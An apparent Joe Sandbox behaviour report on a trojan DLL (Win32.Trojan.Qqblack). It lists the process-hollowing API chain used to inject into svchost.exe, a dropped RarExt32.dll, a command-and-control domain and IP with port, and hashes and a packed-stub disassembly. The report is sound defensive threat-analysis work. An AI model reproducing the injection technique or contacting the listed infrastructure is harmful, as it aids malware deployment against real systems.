Source: C:\Windows\SysWOW64\svchost.exe API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00483CEE __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041EED0 FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040F300 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417FF0 FindNextFileA,FindClose,FindFirstFileA,FindClose
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6349
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6093
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6103
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6411
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-7272
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6672
Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-6225
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6724
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-7259
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6157
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6462
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6399
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6147
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-6358
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-6148
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-7259
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-6463
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-6725
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-6359
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-6400
Source: C:\Windows\SysWOW64\svchost.exe API call chain: ExitProcess graph end node graph_7-58232
Source: rundll32.exe, 00000003.00000000.328082991.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004181F0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,748D7540,UnRegisterTypeLib
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10009430 GetProcessHeap,RtlAllocateHeap,MessageBoxA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100017B4 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100017B4 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100017B4 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047C0DA SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047C0EC SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 208.100.26.242 5658
Source: C:\Windows\SysWOW64\svchost.exe Domain query: 52eva.top
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 401000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 4F9000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 554000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 82B008
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page read and write
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,LocalSize,LocalSize,RtlMoveMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,CloseHandle,CloseHandle
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0046D210 GetKeyboardLayout,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetSystemDefaultLangID,VerLanguageNameA,GetTimeZoneInformation,wsprintfA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047E607 GetLocaleInfoA,IsValidCodePage,IsValidLocale
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047E7DC EnumSystemLocalesA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047EA67 EnumSystemLocalesA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047EB7A EnumSystemLocalesA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047ED6E GetLocaleInfoA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047FB7A GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047FC37 GetLocaleInfoA,MultiByteToWideChar
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047FC8D GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0047FD50 GetLocaleInfoW,WideCharToMultiByte
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00472C10 GetLocalTime,GetSystemTime,GetTimeZoneInformation
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0046D210 GetKeyboardLayout,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetSystemDefaultLangID,VerLanguageNameA,GetTimeZoneInformation,wsprintfA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0048D74C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004688C0 GetUserNameA,GetWindowsDirectoryA,GetSystemDirectoryA
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Native API | Path Interception | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 4 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 3 Software Packing | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 2 Clipboard Data | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Masquerading | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Non-Application Layer Protocol | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 111 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Application Layer Protocol | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 511 Process Injection | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact
Behavior graph (ID 736960, sample 5iiXyNVCQ3, start date 03/11/2022, architecture WINDOWS, score 100); the rendered graph is not reproduced here, its recoverable content is:
  • Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures
  • loaddll32.exe starts svchost.exe, cmd.exe, rundll32.exe and 2 other processes; signatures on loaddll32.exe: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  • cmd.exe starts rundll32.exe, which in turn starts svchost.exe
  • rundll32.exe drops C:\Program Files\WinRAP\RarExt32.dll (PE32) and starts WerFault.exe and svchost.exe
  • svchost.exe connects to 52eva.top (208.100.26.242, 49695, 5658, STEADFASTUS, United States); signature on both svchost.exe instances: System process connects to network (likely due to code injection or exploit)
  • the 2 other processes contact 192.168.2.1 (unknown)

Source | Detection | Scanner | Label
5iiXyNVCQ3.dll | 93% | Virustotal | -
5iiXyNVCQ3.dll | 95% | ReversingLabs | Win32.Trojan.Qqblack
5iiXyNVCQ3.dll | 80% | Metadefender | -
5iiXyNVCQ3.dll | 100% | Avira | HEUR/AGEN.1238485
5iiXyNVCQ3.dll | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Program Files\WinRAP\RarExt32.dll | 100% | Avira | HEUR/AGEN.1238485
C:\Program Files\WinRAP\RarExt32.dll | 100% | Joe Sandbox ML | -
C:\Program Files\WinRAP\RarExt32.dll | 95% | ReversingLabs | Win32.Trojan.Qqblack
C:\Program Files\WinRAP\RarExt32.dll | 93% | Virustotal | -
C:\Program Files\WinRAP\RarExt32.dll | 80% | Metadefender | -

Source | Detection | Scanner | Label
0.0.loaddll32.exe.bd4498.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.0.loaddll32.exe.280e2dd.4.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.1000e2dd.2.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.475e2dd.1.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
7.3.svchost.exe.e56000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.loaddll32.exe.280e2dd.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.0.loaddll32.exe.1000e2dd.2.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.2.loaddll32.exe.280e2dd.1.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.475e2dd.4.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
4.2.rundll32.exe.1000e2dd.1.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.2.rundll32.exe.f1fe88.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.2.rundll32.exe.475e2dd.1.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.3.rundll32.exe.475e2dd.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
4.3.rundll32.exe.68ffa0.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.3.svchost.exe.eab008.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
4.3.rundll32.exe.aee2dd.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.1000e2dd.5.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.f1fe88.3.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.0.loaddll32.exe.1000e2dd.5.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.0.rundll32.exe.f1fe88.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
7.2.svchost.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1225179
0.0.loaddll32.exe.bd4498.3.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.2.loaddll32.exe.1000e2dd.2.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
4.2.rundll32.exe.aee2dd.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
3.2.rundll32.exe.1000e2dd.2.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
0.0.loaddll32.exe.280e2dd.1.unpack | 100% | Avira | TR/Crypt.NSPM.Gen
4.3.rundll32.exe.68ffa0.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.loaddll32.exe.bd4498.0.unpack | 100% | Avira | TR/Crypt.NSPM.Gen

Source | Detection | Scanner | Label
52eva.top | 7% | Virustotal | -
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
52eva.top | 208.100.26.242 | true | true | - | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
208.100.26.242 | 52eva.top | United States | 32748 | STEADFASTUS | true

IP
192.168.2.1
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:736960
Start date and time:2022-11-03 12:34:10 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 11m 13s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5iiXyNVCQ3 (renamed file extension from none to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winDLL@16/9@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 24.3% (good quality ratio 23.4%)
  • Quality average: 81.5%
  • Quality standard deviation: 25.2%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 103
  • Number of non-executed functions: 165
Cookbook Comments:
  • Override analysis time to 240s for rundll32
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.42.73.29
  • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
  • Not all processes were analyzed; report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:35:13 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
12:35:19 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):346783
Entropy (8bit):7.996288147606643
Encrypted:true
SSDEEP:6144:nuPt5aWk+Y/3hINHl9bVKRI0cZ+rmSM2DTlMVfPshRkj7ITKWVE3Rr1BdFnIi3Dq:nq5ayQRIBPQpx4MKVfPcEMeW4r1r1q2Q
MD5:73C06C75BD9AA0A194B0DC73AB38CAC5
SHA1:7604D4BE31E6C017E3BD9A1E5590A81A7AAFB40F
SHA-256:FDE687287EF8CD7E6A6CE655355EACA2FBA25FD6C22CC1E4040281F73205BA90
SHA-512:C8ABAEA48ABC45FDB8C20EE1945494C42E0E3CD487723F48BD34F31FD31833A94DEB38796397C8359FB3123E028A99AB5E8E05438399DCC34AE65D522F78487A
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 95%
  • Antivirus: Virustotal, Detection: 93%
  • Antivirus: Metadefender, Detection: 80%
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8400335209117962
Encrypted:false
SSDEEP:96:89rfFEagpyMy9hy1Dg/jSupXIQcQ8c6+RccEmcw3G+a+z+HbHg/cBRTf3ocFa9ic:8hD7HSq6MYjAD/u7sfS274Itb
MD5:029B56FA46932336D4C61BCBFC7C378F
SHA1:C669704DC882324B11DB6C3522B1E55A873DC56C
SHA-256:5E4A1C71BAE91320F892346A7B9FC2414CB7F3B027845718669602496755182B
SHA-512:496C8F34DDAECE907A9880EB3ECF94582261112687BFEE45C4880FE41D5B76F7982D703F07C4BEC5EC839FFC09BDD1561EAD706117AE7326FA922CD1FB685735
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9541844269298931
Encrypted:false
SSDEEP:192:5OoziG0oXQHrCiljed+v/u7sfS274It7c:AozigX4rCiljei/u7sfX4It7c
MD5:D4871BD5F09D001ED088F83000470E6C
SHA1:FFCAB51A20C499035AE146931589B1FD9E9FD4E1
SHA-256:31F9341886D4BC84A223453E44A5EA72581C1FE8553125FC413B9BB4918DEDD4
SHA-512:DBBA522DEE9296ADB9E1A475903AB3738D538D26A66E688AE006F8426F19987CFE39CA59278591DF1B9DD88B9FE7A08D9D09DBB49A211BD3478715E894800605
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Thu Nov 3 11:35:16 2022, 0x1205a4 type
Category:dropped
Size (bytes):52196
Entropy (8bit):2.100276099272835
Encrypted:false
SSDEEP:384:M5/e3Pu10D2Mc31XAU7gB4PxVTnaRsjX9e:A/e3PQXAU7gBEVrH9e
MD5:EB05BCAEF80D6506CB224436AABDF23B
SHA1:B7C399B3652175ED0C13349064A4CF82B73C046E
SHA-256:BDB78C5C68739527F64F8F5E4D02722E7EA16A59BBD7D51F06ABF43325A2F24D
SHA-512:936320A6FF6E732E18C93E04C5B05D50F7B70B34AB4C9635D34736AC5C4C352CF0E136081159EBCCEC17F523274BF70E57AA8111F379CCFD281B09C6FEE9229C
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8362
Entropy (8bit):3.6863479858171404
Encrypted:false
SSDEEP:192:Rrl7r3GLNigz6r7Xc6YeCSUD0gmf+RSyiQ+pDN89baIsfSem:RrlsNiU6r7Xc6Y7SUD0gmf+RSyVa7fi
MD5:DFAD9C1AB9D806D7B01DDAFAF8ACD34B
SHA1:59C0AD8ACF214B2EC64EDB2751E98CC159245C4F
SHA-256:D8CF1907D1E9B46F8EE1D90E6377FEFFF34A6C16582A972DCD1BFF26AAC5773E
SHA-512:FF618E82D4383B86F4B4890346DDC2A6560574049B129190433E860FBA7C2F18C6F2F9E50E035282AF48344E144C4A6E91F422AFF04B1290842E6A9112DB99DB
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4659
Entropy (8bit):4.417019346367334
Encrypted:false
SSDEEP:48:cvIwSD8zsEJgtWI9vvWgc8sqYjU8fm8M4JtNJF1x+q8vvNzKcQIcQwj4d:uITfCI+grsqY9JjKNKkwj4d
MD5:2458C14FABB503C2EC5BB679358ACBD3
SHA1:590750A58C4B7D08D8C7FE6982917D1BAB14D0AD
SHA-256:8FD99E797CDF7937C7E653E9AD6B551FABBE95EDF2CB2EF18F67EF9CD202844D
SHA-512:A83B9728E50562E8BF64A8FC9A85B9D56C0325C70AE47A7743B6182E11D29DB0FACBABC37225D107561232D97C972C599234E24221E2111D1D73AE1461811A9C
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Thu Nov 3 11:35:18 2022, 0x1205a4 type
Category:dropped
Size (bytes):54232
Entropy (8bit):2.031946433338903
Encrypted:false
SSDEEP:192:1S5RU7kxSJ1O5SkbJYh0aKyiM2PDdAQtnq/v8wYVuedFZCATN3cm:qxF5Lb002J2PDdAQQYVuy3Nsm
MD5:AA44E92E0176A2ACF98F8858692C0ABD
SHA1:E9BDE845E0E90E3192DFA6783BB156990C18928A
SHA-256:17232689A5E7C9B99F13C02CD1ED79D7AB4A9414B95E3EF370C1D5EDD10EBAEB
SHA-512:4DD89C5418B9D451B5B5A7C3F1CF7B12896271731D551D6623007BF1770E81F2165095971E5C4C07C0BDD50D2B831E6A1207D74FAA28463ABDA40F71DC864C74
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8346
Entropy (8bit):3.6859501652550146
Encrypted:false
SSDEEP:192:Rrl7r3GLNiGN60zl66YgD067b/Mgmf8kRSKQ+pDH89bd0sfYfm:RrlsNic696Yq067b/Mgmf8kRS/dnfN
MD5:80A5435F92AC764FD43A4D26D0F6A498
SHA1:5EE6E7A91C9586B919A870876DC2279EAD34A071
SHA-256:227B42D87F9C480DC3373FD2FA6DFF47CF3BC75DFFAB293D8B51A4CE7A778BB8
SHA-512:7DB8567B178598F64A7E32428578D55C7C9DA6F6A084A5468701F47D15D3B11597BAAD31DA5BAC9EE7D6F4FBA38DB2F5739E855C685EE7D856B07ED82B5DA378
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>964</Pid>
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4731
Entropy (8bit):4.438037024201743
Encrypted:false
SSDEEP:48:cvIwSD8zsEJgtWI9vvWgc8sqYjU8fm8M4JCdsNJFuDo+q8vjsNLA4SrSKd:uITfCI+grsqYlJwoKkADWKd
MD5:C3E1CAEDBAABCB26F01B8D4816EAA26E
SHA1:CBB46BBC8F6DD48E9BE7836B93512ED62F541225
SHA-256:E7C3546CE9687DA3F667E49464BBACA4514BE6A1145C2C202B1D143B70E71CCD
SHA-512:C822A0B7AE5BE0256C50D4084036B6541CD09B271BA0E75E8CBD8F1B0F0F97C484B518A7B713582FB0B4B840C4540FAEFDE2568B8D342BD0CD044134ABD0119A
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="17134" /> <arg nm="vercsdbld" val="1" /> <arg nm="verqfe" val="1" /> <arg nm="csdbld" val="1" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="1033" /> <arg nm="geoid" val="244" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="1763805" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.1.17134.0-11.0.47" /> <arg nm="portos" val="0" /> <arg nm="ram" val="4096" />
File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.996288147606643
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:5iiXyNVCQ3.dll
File size:346783
MD5:73c06c75bd9aa0a194b0dc73ab38cac5
SHA1:7604d4be31e6c017e3bd9a1e5590a81a7aafb40f
SHA256:fde687287ef8cd7e6a6ce655355eaca2fba25fd6c22cc1e4040281f73205ba90
SHA512:c8abaea48abc45fdb8c20ee1945494c42e0e3cd487723f48bd34f31fd31833a94deb38796397c8359fb3123e028a99ab5e8e05438399dcc34ae65d522f78487a
SSDEEP:6144:nuPt5aWk+Y/3hINHl9bVKRI0cZ+rmSM2DTlMVfPshRkj7ITKWVE3Rr1BdFnIi3Dq:nq5ayQRIBPQpx4MKVfPcEMeW4r1r1q2Q
TLSH:B174229DD43BBC04C24357F491121B930F57BD5CDAA2206572FE2DF6881AE205FB2EA6
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .L`N.L`N.L`N.7|B.M`N..o..N`N..|@.N`N.#.J.N`N...D.N`N.L`O."`N..o.._`N.zFE.z`N.L`N.M`N...E.O`N...J.M`N.RichL`N................
Icon Hash:74f0e4ecccdce0e4
Entrypoint:0x1008354e
Entrypoint Section:.nsp1
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:0x5862801B [Tue Dec 27 14:52:11 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:99eb8dcfbd1a7e02dc8bf9d49c4aa67c
Instruction
pushfd
pushad
call 00007F9124999295h
pop ebp
mov eax, 00000007h
sub ebp, eax
lea esi, dword ptr [ebp-00000272h]
mov al, byte ptr [esi]
cmp al, 00h
je 00007F91249992A4h
mov esi, ebp
lea esi, dword ptr [ebp-0000024Ah]
mov al, byte ptr [esi]
cmp al, 01h
je 00007F91249994D8h
mov byte ptr [esi], 00000001h
mov edx, ebp
sub edx, dword ptr [ebp-000002B6h]
mov dword ptr [ebp-000002B6h], edx
add dword ptr [ebp-00000286h], edx
lea esi, dword ptr [ebp-00000242h]
add dword ptr [esi], edx
pushad
push 00000040h
push 00001000h
push 00001000h
push 00000000h
call dword ptr [ebp-0000020Eh]
test eax, eax
je 00007F9124999600h
mov dword ptr [ebp-0000028Eh], eax
call 00007F9124999295h
pop ebx
mov ecx, 00000368h
add ebx, ecx
push eax
push ebx
call 00007F9124999546h
popad
mov esi, dword ptr [esi]
mov edi, ebp
add edi, dword ptr [ebp-000002C6h]
mov ebx, edi
cmp dword ptr [edi], 00000000h
